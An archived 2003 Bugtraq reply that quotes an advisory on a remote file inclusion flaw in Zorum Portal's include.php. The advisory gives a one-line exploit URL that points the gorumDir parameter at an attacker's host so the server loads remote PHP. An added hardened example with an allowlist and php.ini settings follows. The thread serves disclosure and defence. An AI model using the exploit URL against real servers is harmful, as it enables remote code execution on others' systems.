Re[2]: Zorum Portal (PHP)

From: Messer (igmpfragat_private)
Date: Tue Jan 28 2003 - 20:39:37 PST


    Hello MGHz,
    
    >>From: MGhz <magasat_private>
    >>To: bugtraqat_private
    >>Subject: Zorum Portal  (PHP)
    >>Date: 22 Jan 2003 19:45:26 -0000
    >>
    >>
    >>
    >>Version : 3.0;3.1;3.2
    >>Website : http://zorum.phpoutsourcing.com/
    >>Problem : Include file
    >>
    >>
    >>File:
    >>---------------------------------
    >>include.php
    >>---------------------------------
    >>
    >>PHP Code:
    >>---------------------------------
    >>[...]
    >>include("$gorumDir/generformlib_multipleselection.php");
    >>include("$gorumDir/generformlib_groupselection.php");
    >>include("$gorumDir/generformlib_filebutton.php");
    >>include("$gorumDir/group.php");
    >>[...]
    >>---------------------------------
    >>
    >>Exploit :
    >>---------------------------------
    >>http://[target]/[forum_dir]/include.php?gorumDir=http://[attacker]/
    >>-->
    >>include http://[attacker]/group.php on remote server
    >>---------------------------------
    >>
    >>--
    >>magasat_private
    
    In new versions of PHP (PHP 4.2.3 and higher), to receive values
    transmitted to the form, it's necessary to write:
    
    $Variable = $HTTP_GET_VARS['var']; // Request Method - GET
    or
    $Variable = $HTTP_POST_VARS['var']; // Request Method - POST
    
    
    // example: http://host.com/script.php?var1=value1&var2=value2
    $Var_1 = $HTTP_GET_VARS['var1'];
    $Var_2 = $var2;
    // $Var_1 == "value1"
    // $Var_2 == ""
    
    Messer.
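
A hardened form of the include pattern quoted in the advisory, as an added example that is not part of either post and is not Zorum's code: the include base is fixed server-side instead of coming from a variable a request can set, and each file is resolved against an allowlist. It uses `$_GET`/`$_POST`/`$_COOKIE` (PHP 4.1.0 and later) rather than `$HTTP_GET_VARS`; the `gorum` directory location and the `gorum_path()` helper are assumptions.

```php
<?php
// Added example, not Zorum's code. Assumption: the library files live in a
// "gorum" directory next to this script (hypothetical layout).

// 1. The include base is fixed server-side, never taken from the request.
define('GORUM_DIR', __DIR__ . '/gorum');

// 2. With register_globals enabled, a request parameter can seed a global of
//    the same name, so reject any request that carries one.
if (isset($_GET['gorumDir']) || isset($_POST['gorumDir'])
    || isset($_COOKIE['gorumDir'])) {
    header('HTTP/1.1 400 Bad Request');
    exit('Unexpected parameter');
}

// 3. Only these files may be loaded (names taken from the advisory).
$allowed = array(
    'generformlib_multipleselection.php',
    'generformlib_groupselection.php',
    'generformlib_filebutton.php',
    'group.php',
);

// Hypothetical helper: map an allowlisted name to a real path inside
// GORUM_DIR, or return false.
function gorum_path($file, $allowed)
{
    if (!in_array($file, $allowed, true)) {
        return false;
    }
    $base = realpath(GORUM_DIR);
    $path = realpath(GORUM_DIR . '/' . $file);
    if ($base === false || $path === false) {
        return false; // missing directory or file
    }
    // realpath() has resolved symlinks and "..": require the base prefix.
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : false;
}

foreach ($allowed as $file) {
    $path = gorum_path($file, $allowed);
    if ($path === false) {
        error_log("include.php: refusing to load $file");
        exit(1);
    }
    require_once $path;
}
```

As defence in depth, keep `register_globals = Off` in php.ini and disable remote includes with `allow_url_include = Off` (PHP 5.2 and later; on older versions `allow_url_fopen` governs them).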
    



    This archive was generated by hypermail 2b30 : Wed Jan 29 2003 - 12:02:54 PST